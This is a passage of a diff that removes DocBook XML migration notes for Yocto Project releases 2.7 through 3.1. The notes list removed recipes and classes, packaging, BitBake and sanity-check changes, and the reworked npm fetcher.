-                    Debug split: The default debug split has been changed to
-                    create separate source packages (i.e.
-                    <replaceable>package_name</replaceable><filename>-dbg</filename>
-                    and
-                    <replaceable>package_name</replaceable><filename>-src</filename>).
-                    If you are currently using <filename>dbg-pkgs</filename>
-                    in
-                    <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>
-                    to bring in debug symbols and you still need the sources,
-                    you must now also add <filename>src-pkgs</filename> to
-                    <filename>IMAGE_FEATURES</filename>.
-                    Source packages remain in the target portion of the SDK
-                    by default, unless you have set your own value for
-                    <link linkend='var-SDKIMAGE_FEATURES'><filename>SDKIMAGE_FEATURES</filename></link>
-                    that does not include <filename>src-pkgs</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    Mount all using <filename>util-linux</filename>:
-                    <filename>/etc/default/mountall</filename> has
-                    moved into the -mount sub-package.
-                    </para></listitem>
-                <listitem><para>
-                    Splitting binaries using <filename>util-linux</filename>:
-                    <filename>util-linux</filename> now splits each binary into
-                    its own package for fine-grained control.
-                    The main <filename>util-linux</filename> package pulls in
-                    the individual binary packages using the
-                    <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>
-                    and
-                    <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
-                    variables.
-                    As a result, existing images should not see any changes
-                    assuming
-                    <link linkend='var-NO_RECOMMENDATIONS'><filename>NO_RECOMMENDATIONS</filename></link>
-                    is not set.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>netbase/base-files</filename>:
-                    <filename>/etc/hosts</filename> has moved from
-                    <filename>netbase</filename> to
-                    <filename>base-files</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>tzdata</filename>: The main package has been
-                    converted to an empty meta package that pulls in all
-                    <filename>tzdata</filename> packages by default.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>lrzsz</filename>: This package has been removed
-                    from <filename>packagegroup-self-hosted</filename> and
-                    <filename>packagegroup-core-tools-testapps</filename>.
-                    The X/Y/ZModem support is less likely to be needed on
-                    modern systems.
-                    If you are relying on these packagegroups to include the
-                    <filename>lrzsz</filename> package in your image, you
-                    now need to explicitly add the package.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.7-removed-recipes'>
-        <title>Removed Recipes</title>
-
-        <para>
-            The following recipes have been removed:
-            <literallayout class='monospaced'>
-     <emphasis>gcc</emphasis>: Drop version 7.3 recipes. Version 8.3 now remains.
-
-     <emphasis>linux-yocto</emphasis>: Drop versions 4.14 and 4.18 recipes. Versions 4.19 and 5.0 remain.
-
-     <emphasis>go</emphasis>: Drop version 1.9 recipes. Versions 1.11 and 1.12 remain.
-
-     <emphasis>xvideo-tests</emphasis>: Became obsolete.
-
-     <emphasis>libart-lgpl</emphasis>: Became obsolete.
-
-     <emphasis>gtk-icon-utils-native</emphasis>: These tools are now provided by gtk+3-native
-
-     <emphasis>gcc-cross-initial</emphasis>: No longer needed. gcc-cross/gcc-crosssdk is now used instead.
-
-     <emphasis>gcc-crosssdk-initial</emphasis>: No longer needed. gcc-cross/gcc-crosssdk is now used instead.
-
-     <emphasis>glibc-initial</emphasis>: Removed because the benefits of having it for site_config are
-        currently outweighed by the cost of building the recipe.
-            </literallayout>
-         </para>
-    </section>
-
-    <section id='migration-2.7-removed-classes'>
-        <title>Removed Classes</title>
-
-        <para>
-            The following classes have been removed:
-            <literallayout class='monospaced'>
-     <emphasis>distutils-tools</emphasis>: This class was never used.
-
-     <emphasis>bugzilla.bbclass</emphasis>: Became obsolete.
-
-     <emphasis>distrodata</emphasis>: This functionally has been replaced by a more modern
-         tinfoil-based implementation.
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='migration-2.7-miscellaneous-changes'>
-        <title>Miscellaneous Changes</title>
-
-        <para>
-            The following miscellaneous changes occurred:
-            <itemizedlist>
-                <listitem><para>
-                    The <filename>distro</filename> subdirectory of the Poky
-                    repository has been removed from the top-level
-                    <filename>scripts</filename> directory.
-                    </para></listitem>
-                <listitem><para>
-                    Perl now builds for the target using
-                    <ulink url='http://arsv.github.io/perl-cross/'><filename>perl-cross</filename></ulink>
-                    for better maintainability and improved build performance.
-                    This change should not present any problems unless you have
-                    heavily customized your Perl recipe.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>arm-tunes</filename>: Removed the "-march"
-                    option if mcpu is already added.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>update-alternatives</filename>: Convert file
-                    renames to
-                    <link linkend='var-PACKAGE_PREPROCESS_FUNCS'><filename>PACKAGE_PREPROCESS_FUNCS</filename></link>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>base/pixbufcache</filename>: Obsolete
-                    <filename>sstatecompletions</filename> code has been
-                    removed.
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='ref-classes-native'><filename>native</filename></link>
-                    class:
-                    <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
-                    handling has been enabled.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>inetutils</filename>: This recipe has rsh
-                    disabled.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</section>
-
-<section id='moving-to-the-yocto-project-3.0-release'>
-    <title>Moving to the Yocto Project 3.0 Release</title>
-
-    <para>
-        This section provides migration information for moving to the
-        Yocto Project 3.0 Release from the prior release.
-    </para>
-
-    <section id='migration-3.0-init-system-selection'>
-        <title>Init System Selection</title>
-
-        <para>
-            Changing the init system manager previously required setting a
-            number of different variables.
-            You can now change the manager by setting the
-            <filename>INIT_MANAGER</filename> variable and the corresponding
-            include files
-            (i.e. <filename>conf/distro/include/init-manager-*.conf</filename>).
-            Include files are provided for four values: "none", "sysvinit",
-            "systemd", and "mdev-busybox".
-            The default value, "none", for <filename>INIT_MANAGER</filename>
-            should allow your current settings to continue working.
-            However, it is advisable to explicitly set
-            <filename>INIT_MANAGER</filename>.
-        </para>
-    </section>
-
-    <section id='migration-3.0-lsb-support-removed'>
-        <title>LSB Support Removed</title>
-
-        <para>
-            Linux Standard Base (LSB) as a standard is not current, and
-            is not well suited for embedded applications.
-            Support can be continued in a separate layer if needed.
-            However, presently LSB support has been removed from the core.
-        </para>
-
-        <para>
-            As a result of this change, the <filename>poky-lsb</filename>
-            derivative distribution configuration that was also used for
-            testing alternative configurations has been replaced with a
-            <filename>poky-altcfg</filename> distribution that has LSB
-            parts removed.
-        </para>
-    </section>
-
-    <section id='migration-3.0-removed-recipes'>
-        <title>Removed Recipes</title>
-
-        <para>
-            The following recipes have been removed.
-            <itemizedlist>
-                <listitem><para>
-                    <filename>core-image-lsb-dev</filename>: Part of removed
-                    LSB support.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>core-image-lsb</filename>: Part of removed
-                    LSB support.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>core-image-lsb-sdk</filename>: Part of removed
-                    LSB support.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>cve-check-tool</filename>: Functionally replaced
-                    by the <filename>cve-update-db</filename> recipe and
-                    <filename>cve-check</filename> class.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>eglinfo</filename>: No longer maintained.
-                    <filename>eglinfo</filename> from
-                    <filename>mesa-demos</filename> is an adequate and
-                    maintained alternative.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>gcc-8.3</filename>: Version 8.3 removed.
-                    Replaced by 9.2.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>gnome-themes-standard</filename>: Only needed
-                    by gtk+ 2.x, which has been removed.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>gtk+</filename>: GTK+ 2 is obsolete and has been
-                    replaced by gtk+3.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>irda-utils</filename>: Has become obsolete.
-                    IrDA support has been removed from the Linux kernel in
-                    version 4.17 and later.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>libnewt-python</filename>:
-                    <filename>libnewt</filename> Python support merged into
-                    main <filename>libnewt</filename> recipe.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>libsdl</filename>: Replaced by newer
-                    <filename>libsdl2</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>libx11-diet</filename>: Became obsolete.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>libxx86dga</filename>: Removed obsolete client
-                    library.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>libxx86misc</filename>: Removed. Library is
-                    redundant.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>linux-yocto</filename>: Version 5.0 removed,
-                    which is now redundant (5.2 / 4.19 present).
-                    </para></listitem>
-                <listitem><para>
-                    <filename>lsbinitscripts</filename>: Part of removed LSB
-                    support.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>lsb</filename>: Part of removed LSB support.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>lsbtest</filename>: Part of removed LSB support.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>openssl10</filename>: Replaced by newer
-                    <filename>openssl</filename> version 1.1.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>packagegroup-core-lsb</filename>: Part of removed
-                    LSB support.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>python-nose</filename>: Removed the Python 2.x
-                    version of the recipe.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>python-numpy</filename>: Removed the Python 2.x
-                    version of the recipe.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>python-scons</filename>: Removed the Python 2.x
-                    version of the recipe.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>source-highlight</filename>: No longer needed.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>stress</filename>: Replaced by
-                    <filename>stress-ng</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>vulkan</filename>: Split into
-                    <filename>vulkan-loader</filename>,
-                    <filename>vulkan-headers</filename>, and
-                    <filename>vulkan-tools</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>weston-conf</filename>: Functionality moved to
-                    <filename>weston-init</filename>.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-3.0-packaging-changes'>
-        <title>Packaging Changes</title>
-
-        <para>
-            The following packaging changes have occurred.
-            <itemizedlist>
-                <listitem><para>
-                    The
-                    <ulink url='https://en.wikipedia.org/wiki/GNOME_Web'>Epiphany</ulink>
-                    browser has been dropped from
-                    <filename>packagegroup-self-hosted</filename> as it has
-                    not been needed inside
-                    <filename>build-appliance-image</filename> for
-                    quite some time and was causing resource problems.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>libcap-ng</filename> Python support has been
-                    moved to a separate <filename>libcap-ng-python</filename>
-                    recipe to streamline the build process when the Python
-                    bindings are not needed.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>libdrm</filename> now packages the file
-                    <filename>amdgpu.ids</filename> into a separate
-                    <filename>libdrm-amdgpu</filename> package.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>python3</filename>: The
-                    <filename>runpy</filename> module is now in the
-                    <filename>python3-core</filename> package as it is
-                    required to support the common "python3 -m" command usage.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>distcc</filename> now provides separate
-                    <filename>distcc-client</filename> and
-                    <filename>distcc-server</filename> packages as typically
-                    one or the other are needed, rather than both.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>python*-setuptools</filename> recipes now
-                    separately package the <filename>pkg_resources</filename>
-                    module in a <filename>python-pkg-resources</filename> /
-                    <filename>python3-pkg-resources</filename> package as
-                    the module is useful independent of the rest of the
-                    setuptools package.
-                    The main <filename>python-setuptools</filename> /
-                    <filename>python3-setuptools</filename> package depends
-                    on this new package so you should only need to update
-                    dependencies unless you want to take advantage of the
-                    increased granularity.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-3.0-cve-checking'>
-        <title>CVE Checking</title>
-
-        <para>
-            <filename>cve-check-tool</filename> has been functionally replaced
-            by a new <filename>cve-update-db</filename> recipe and
-            functionality built into the <filename>cve-check</filename> class.
-            The result uses NVD JSON data feeds rather than the deprecated
-            XML feeds that <filename>cve-check-tool</filename> was using,
-            supports CVSSv3 scoring, and makes other improvements.
-        </para>
-
-        <para>
-            Additionally, the <filename>CVE_CHECK_CVE_WHITELIST</filename>
-            variable has been replaced by
-            <filename>CVE_CHECK_WHITELIST</filename>.
-        </para>
-    </section>
-
-    <section id='migration-3.0-bitbake-changes'>
-        <title>Bitbake Changes</title>
-
-        <para>
-            The following BitBake changes have occurred.
-            <itemizedlist>
-                <listitem><para>
-                    <filename>addtask</filename> statements now properly
-                    validate dependent tasks.
-                    Previously, an invalid task was silently ignored.
-                    With this change, the invalid task generates a warning.
-                    </para></listitem>
-                <listitem><para>
-                    Other invalid <filename>addtask</filename> and
-                    <filename>deltask</filename> usages now trigger these
-                    warnings: "multiple target tasks arguments with
-                    addtask / deltask", and "multiple before/after clauses".
-                    </para></listitem>
-                <listitem><para>
-                    The "multiconfig" prefix is now shortened to "mc".
-                    "multiconfig" will continue to work, however it may be
-                    removed in a future release.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>bitbake -g</filename> command no longer
-                    generates a <filename>recipe-depends.dot</filename> file
-                    as the contents (i.e. a reprocessed version of
-                    <filename>task-depends.dot</filename>) were confusing.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>bb.build.FuncFailed</filename> exception,
-                    previously raised by
-                    <filename>bb.build.exec_func()</filename> when certain
-                    other exceptions have occurred, has been removed.
-                    The real underlying exceptions will be raised instead.
-                    If you have calls to
-                    <filename>bb.build.exec_func()</filename> in custom classes
-                    or <filename>tinfoil-using</filename> scripts, any
-                    references to <filename>bb.build.FuncFailed</filename>
-                    should be cleaned up.
-                    </para></listitem>
-                <listitem><para>
-                    Additionally, the
-                    <filename>bb.build.exec_func()</filename> no longer accepts
-                    the "pythonexception" parameter.
-                    The function now always raises exceptions.
-                    Remove this argument in any calls to
-                    <filename>bb.build.exec_func()</filename> in custom classes
-                    or scripts.
-                    </para></listitem>
-                <listitem><para>
-                    The
-                    <ulink url='&YOCTO_DOCS_BB_URL;#var-bb-BB_SETSCENE_VERIFY_FUNCTION2'><filename>BB_SETSCENE_VERIFY_FUNCTION2</filename></ulink>
-                    is no longer used.
-                    In the unlikely event that you have any references to it,
-                    they should be removed.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>RunQueueExecuteScenequeue</filename> and
-                    <filename>RunQueueExecuteTasks</filename> events have been
-                    removed since setscene tasks are now executed as part of
-                    the normal runqueue.
-                    Any event handling code in custom classes or scripts that
-                    handles these two events need to be updated.
-                    </para></listitem>
-                <listitem><para>
-                    The arguments passed to functions used with
-                    <ulink url='&YOCTO_DOCS_BB_URL;#var-bb-BB_HASHCHECK_FUNCTION'><filename>BB_HASHCHECK_FUNCTION</filename></ulink>
-                    have changed.
-                    If you are using your own custom hash check function, see
-                    <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?id=40a5e193c4ba45c928fccd899415ea56b5417725'></ulink>
-                    for details.
-                    </para></listitem>
-                <listitem><para>
-                    Task specifications in <filename>BB_TASKDEPDATA</filename>
-                    and class implementations used in signature generator
-                    classes now use "&lt;fn&gt;:&lt;task&gt;" everywhere rather than
-                    the "." delimiter that was being used in some places.
-                    This change makes it consistent with all areas in the code.
-                    Custom signature generator classes and code that reads
-                    <filename>BB_TASKDEPDATA</filename> need to be updated to
-                    use ':' as a separator rather than '.'.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-3.0-sanity-checks'>
-        <title>Sanity Checks</title>
-
-        <para>
-            The following sanity check changes occurred.
-            <itemizedlist>
-                <listitem><para>
-                    <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
-                    is now checked for usage of two problematic items:
-                    <itemizedlist>
-                        <listitem><para>
-                            "${PN}" prefix/suffix use - Warnings always appear
-                            if ${PN} is used.
-                            You must fix the issue regardless of whether
-                            multiconfig or anything else that would cause
-                            prefixing/suffixing to happen.
-                            </para></listitem>
-                        <listitem><para>
-                            Github archive tarballs - these are not guaranteed
-                            to be stable.
-                            Consequently, it is likely that the tarballs will
-                            be refreshed and thus the SRC_URI checksums
-                            will fail to apply.
-                            It is recommended that you fetch either an official
-                            release tarball or a specific revision from the
-                            actual Git repository instead.
-                            </para></listitem>
-                    </itemizedlist>
-                    Either one of these items now trigger a warning by default.
-                    If you wish to disable this check, remove
-                    <filename>src-uri-bad</filename> from
-                    <link linkend='var-WARN_QA'><filename>WARN_QA</filename></link>.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>file-rdeps</filename> runtime dependency
-                    check no longer expands
-                    <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
-                    recursively as there is no mechanism to ensure they can be
-                    fully computed, and thus races sometimes result in errors
-                    either showing up or not.
-                    Thus, you might now see errors for missing runtime
-                    dependencies that were previously satisfied recursively.
-                    Here is an example: package A contains a shell script
-                    starting with <filename>#!/bin/bash</filename> but has no
-                    dependency on bash.
-                    However, package A depends on package B, which does depend
-                    on bash.
-                    You need to add the missing dependency or dependencies to
-                    resolve the warning.
-                    </para></listitem>
-                <listitem><para>
-                    Setting <filename>DEPENDS_${PN}</filename> anywhere
-                    (i.e. typically in a recipe) now triggers an error.
-                    The error is triggered because
-                    <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>
-                    is not a package-specific variable unlike RDEPENDS.
-                    You should set <filename>DEPENDS</filename> instead.
-                    </para></listitem>
-                <listitem><para>
-                    systemd currently does not work well with the musl C
-                    library because only upstream officially supports linking
-                    the library with glibc.
-                    Thus, a warning is shown when building systemd in
-                    conjunction with musl.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-3.0-miscellaneous-changes'>
-        <title>Miscellaneous Changes</title>
-
-        <para>
-            The following miscellaneous changes have occurred.
-            <itemizedlist>
-                <listitem><para>
-                    The <filename>gnome</filename>
-                    class has been removed because it now does very little.
-                    You should update recipes that previously inherited this
-                    class to do the following:
-                    <literallayout class='monospaced'>
-     inherit gnomebase gtk-icon-cache gconf mime
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    The
-                    <filename>meta/recipes-kernel/linux/linux-dtb.inc</filename>
-                    file has been removed.
-                    This file was previously deprecated in favor of setting
-                    <link linkend='var-KERNEL_DEVICETREE'><filename>KERNEL_DEVICETREE</filename></link>
-                    in any kernel recipe and only produced a warning.
-                    Remove any <filename>include</filename> or
-                    <filename>require</filename> statements pointing to this
-                    file.
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='var-TARGET_CFLAGS'><filename>TARGET_CFLAGS</filename></link>,
-                    <link linkend='var-TARGET_CPPFLAGS'><filename>TARGET_CPPFLAGS</filename></link>,
-                    <link linkend='var-TARGET_CXXFLAGS'><filename>TARGET_CXXFLAGS</filename></link>,
-                    and
-                    <link linkend='var-TARGET_LDFLAGS'><filename>TARGET_LDFLAGS</filename></link>
-                    are no longer exported to the external environment.
-                    This change did not require any changes to core recipes,
-                    which is a good indicator that no changes will be
-                    required.
-                    However, if for some reason the software being built by one
-                    of your recipes is expecting these variables to be set,
-                    then building the recipe will fail.
-                    In such cases, you must either export the variable or
-                    variables in the recipe or change the scripts so that
-                    exporting is not necessary.
-                    </para></listitem>
-                <listitem><para>
-                    You must change the host distro identifier used in
-                    <link linkend='var-NATIVELSBSTRING'><filename>NATIVELSBSTRING</filename></link>
-                    to use all lowercase characters even if it does not contain
-                    a version number.
-                    This change is necessary only if you are not using
-                    <filename>uninative</filename> and
-                    <link linkend='var-SANITY_TESTED_DISTROS'><filename>SANITY_TESTED_DISTROS</filename></link>.
-                    </para></listitem>
-                <listitem><para>
-                    In the <filename>base-files</filename> recipe, writing the
-                    hostname into <filename>/etc/hosts</filename> and
-                    <filename>/etc/hostname</filename> is now done within the
-                    main
-                    <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-                    function rather than in the
-                    <filename>do_install_basefilesissue</filename> function.
-                    The reason for the change is because
-                    <filename>do_install_basefilesissue</filename> is more
-                    easily overridden without having to duplicate the hostname
-                    functionality.
-                    If you have done the latter (e.g. in a
-                    <filename>base-files</filename> bbappend), then you should
-                    remove it from your customized
-                    <filename>do_install_basefilesissue</filename> function.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>wic --expand</filename> command now uses
-                    commas to separate "key:value" pairs rather than hyphens.
-                    <note>
-                        The wic command-line help is not updated.
-                    </note>
-                    You must update any scripts or commands where you use
-                    <filename>wic --expand</filename> with multiple
-                    "key:value" pairs.
-                    </para></listitem>
-                <listitem><para>
-                    UEFI image variable settings have been moved from various
-                    places to a central
-                    <filename>conf/image-uefi.conf</filename>.
-                    This change should not influence any existing configuration
-                    as the <filename>meta/conf/image-uefi.conf</filename>
-                    in the core metadata sets defaults that can be overridden
-                    in the same manner as before.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>conf/distro/include/world-broken.inc</filename>
-                    has been removed.
-                    For cases where certain recipes need to be disabled when
-                    using the musl C library, these recipes now have
-                    <filename>COMPATIBLE_HOST_libc-musl</filename> set with a
-                    comment that explains why.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</section>
-
-
-<section id='moving-to-the-yocto-project-3.1-release'>
-    <title>Moving to the Yocto Project 3.1 Release</title>
-
-    <para>
-        This section provides migration information for moving to the
-        Yocto Project 3.1 Release from the prior release.
-    </para>
-
-    <section id='migration-3.1-minimum-system-requirements'>
-        <title>Minimum system requirements</title>
-
-        <para>
-            The following versions / requirements of build host components have been updated:
-            <itemizedlist>
-                <listitem><para>gcc 5.0</para></listitem>
-                <listitem><para>python 3.5</para></listitem>
-                <listitem><para>tar 1.28</para></listitem>
-                <listitem><para><filename>rpcgen</filename> is now required on the host (part of the <filename>libc-dev-bin</filename> package on Ubuntu, Debian and related distributions, and the <filename>glibc</filename> package on RPM-based distributions).</para></listitem>
-            </itemizedlist>
-            
-            Additionally, the <filename>makeinfo</filename> and <filename>pod2man</filename>
-            tools are <emphasis>no longer</emphasis> required on the host.
-        </para>
-    </section>
-
-    <section id='migration-3.1-mpc8315e-rdb-removed'>
-        <title>mpc8315e-rdb machine removed</title>
-
-        <para>
-            The MPC8315E-RDB machine is old/obsolete and unobtainable, thus given the maintenance burden
-            the <filename>mpc8315e-rdb</filename> machine configuration that supported it has been removed
-            in this release. The removal does leave a gap in official PowerPC reference hardware
-            support; this may change in future if a suitable machine with accompanying support resources
-            is found.
-        </para>
-    </section>
-    
-    <section id='migration-3.1-python-2-removed'>
-        <title>Python 2 removed</title>
-
-        <para>
-            Due to the expiration of upstream support in January 2020, support for Python 2 has now been removed; it is recommended that you use Python 3 instead. If absolutely needed there is a meta-python2 community layer containing Python 2, related classes and various Python 2-based modules, however it should not be considered as supported.
-        </para>
-    </section>
-
-    <section id='migration-3.1-reproducible-builds'>
-        <title>Reproducible builds now enabled by default</title>
-
-        <para>
-            In order to avoid unnecessary differences in output files (aiding binary reproducibility), the Poky distribution configuration (<filename><link linkend='var-DISTRO'>DISTRO</link> = "poky"</filename>) now inherits the <filename>reproducible_build</filename> class by default.
-        </para>
-    </section>
-    
-    <section id='migration-3.1-ptest-feature-impact'>
-        <title>Impact of ptest feature is now more significant</title>
-
-        <para>
-            The Poky distribution configuration (<filename><link linkend='var-DISTRO'>DISTRO</link> = "poky"</filename>) enables ptests by default to enable runtime testing of various components. In this release, a dependency needed to be added that has resulted in a significant increase in the number of components that will be built just when building a simple image such as core-image-minimal. If you do not need runtime tests enabled for core components, then it is recommended that you remove "ptest" from <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link> to save a significant amount of build time e.g. by adding the following in your configuration:
-
-            <literallayout class='monospaced'>
-      DISTRO_FEATURES_remove = "ptest"
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='migration-3.1-removed-recipes'>
-        <title>Removed recipes</title>
-
-        <para>
-            The following recipes have been removed:
-
-            <itemizedlist>
-                <listitem><para><filename>chkconfig</filename>: obsolete</para></listitem>
-                <listitem><para><filename>console-tools</filename>: obsolete</para></listitem>
-                <listitem><para><filename>enchant</filename>: replaced by <filename>enchant2</filename></para></listitem>
-                <listitem><para><filename>foomatic-filters</filename>: obsolete</para></listitem>
-                <listitem><para><filename>libidn</filename>: no longer needed, moved to meta-oe</para></listitem>
-                <listitem><para><filename>libmodulemd</filename>: replaced by <filename>libmodulemd-v1</filename></para></listitem>
-                <listitem><para><filename>linux-yocto</filename>: drop 4.19, 5.2 version recipes (5.4 now provided)</para></listitem>
-                <listitem><para><filename>nspr</filename>: no longer needed, moved to meta-oe</para></listitem>
-                <listitem><para><filename>nss</filename>: no longer needed, moved to meta-oe</para></listitem>
-                <listitem><para><filename>python</filename>: Python 2 removed (Python 3 preferred)</para></listitem>
-                <listitem><para><filename>python-setuptools</filename>: Python 2 version removed (python3-setuptools preferred)</para></listitem>
-                <listitem><para><filename>sysprof</filename>: no longer needed, moved to meta-oe</para></listitem>
-                <listitem><para><filename>texi2html</filename>: obsolete</para></listitem>
-                <listitem><para><filename>u-boot-fw-utils</filename>: functionally replaced by <filename>libubootenv</filename></para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-3.1-features-check'>
-        <title>features_check class replaces distro_features_check</title>
-
-        <para>
-            The <filename>distro_features_check</filename> class has had its functionality expanded, now supporting <filename>ANY_OF_MACHINE_FEATURES</filename>, <filename>REQUIRED_MACHINE_FEATURES</filename>, <filename>CONFLICT_MACHINE_FEATURES</filename>, <filename>ANY_OF_COMBINED_FEATURES</filename>, <filename>REQUIRED_COMBINED_FEATURES</filename>, <filename>CONFLICT_COMBINED_FEATURES</filename>. As a result the class has now been renamed to <filename>features_check</filename>; the <filename>distro_features_check</filename> class still exists but generates a warning and redirects to the new class. In preparation for a future removal of the old class it is recommended that you update recipes currently inheriting <filename>distro_features_check</filename> to inherit <filename>features_check</filename> instead.
-        </para>
-    </section>
-
-    <section id='migration-3.1-removed-classes'>
-        <title>Removed classes</title>
-
-        <para>
-            The following classes have been removed:
-
-            <itemizedlist>
-                <listitem><para><filename>distutils-base</filename>: moved to meta-python2</para></listitem>
-                <listitem><para><filename>distutils</filename>: moved to meta-python2</para></listitem>
-                <listitem><para><filename>libc-common</filename>: merged into the glibc recipe as nothing else used it.</para></listitem>
-                <listitem><para><filename>python-dir</filename>: moved to meta-python2</para></listitem>
-                <listitem><para><filename>pythonnative</filename>: moved to meta-python2</para></listitem>
-                <listitem><para><filename>setuptools</filename>: moved to meta-python2</para></listitem>
-                <listitem><para><filename>tinderclient</filename>: dropped as it was obsolete.</para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-3.1-src-uri-checksums'>
-        <title>SRC_URI checksum behaviour</title>
-
-        <para>
-            Previously, recipes by tradition included both SHA256 and MD5 checksums for remotely fetched files in <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>, even though only one is actually mandated. However, the MD5 checksum does not add much given its inherent weakness; thus when a checksum fails only the SHA256 sum will now be printed. The md5sum will still be verified if it is specified.
-        </para>
-    </section>
-
-
-    <section id='migration-3.1-npm'>
-        <title>npm fetcher changes</title>
-
-        <para>
-            The npm fetcher has been completely reworked in this release. The npm fetcher now only fetches the package source itself and no longer the dependencies; there is now also an npmsw fetcher which explicitly fetches the shrinkwrap file and the dependencies. This removes the slightly awkward <filename>NPM_LOCKDOWN</filename> and <filename>NPM_SHRINKWRAP</filename> variables which pointed to local files; the lockdown file is no longer needed at all. Additionally, the package name in <filename>npm://</filename> entries in <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link> is now specified using a <filename>package</filename> parameter instead of the earlier <filename>name</filename> which overlapped with the generic <filename>name</filename> parameter. All recipes using the npm fetcher will need to be changed as a result. 
-        </para>
-        <para>
-            An example of the new scheme:
-            <literallayout class='monospaced'>
-SRC_URI = "npm://registry.npmjs.org;package=array-flatten;version=1.1.1 \
-           npmsw://${THISDIR}/npm-shrinkwrap.json"
-            </literallayout>
-            Another example where the sources are fetched from git rather than an npm repository:
-            <literallayout class='monospaced'>
-SRC_URI = "git://github.com/foo/bar.git;protocol=https \
-           npmsw://${THISDIR}/npm-shrinkwrap.json"
-            </literallayout>
-        </para>
-        <para>
-            devtool and recipetool have also been updated to match with the npm fetcher changes. Other than producing working and more complete recipes for npm sources, there is also a minor change to the command line for devtool: the <filename>--fetch-dev</filename> option has been renamed to <filename>--npm-dev</filename> as it is npm-specific.
-        </para>
-    </section>
-    
-    
-    <section id='migration-3.1-packaging-changes'>
-        <title>Packaging changes</title>
-
-        <para>
-            <itemizedlist>
-                <listitem><para><filename>intltool</filename> has been removed from <filename>packagegroup-core-sdk</filename> as it is rarely needed to build modern software - gettext can do most of the things it used to be needed for. <filename>intltool</filename> has also been removed from <filename>packagegroup-core-self-hosted</filename> as it is not needed to for standard builds.</para></listitem>
-                <listitem><para>git: <filename>git-am</filename>, <filename>git-difftool</filename>, <filename>git-submodule</filename>, and <filename>git-request-pull</filename> are no longer perl-based, so are now installed with the main <filename>git</filename> package instead of within <filename>git-perltools</filename>.</para></listitem>
-                <listitem><para>The <filename>ldconfig</filename> binary built as part of glibc has now been moved to its own <filename>ldconfig</filename> package (note no <filename>glibc-</filename> prefix). This package is in the <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link> of the main <filename>glibc</filename> package if <filename>ldconfig</filename> is present in <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>.</para></listitem>
-                <listitem><para><filename>libevent</filename> now splits each shared library into its own package (as Debian does). Since these are shared libraries and will be pulled in through the normal shared library dependency handling, there should be no impact to existing configurations other than less unnecessary libraries being installed in some cases.</para></listitem>
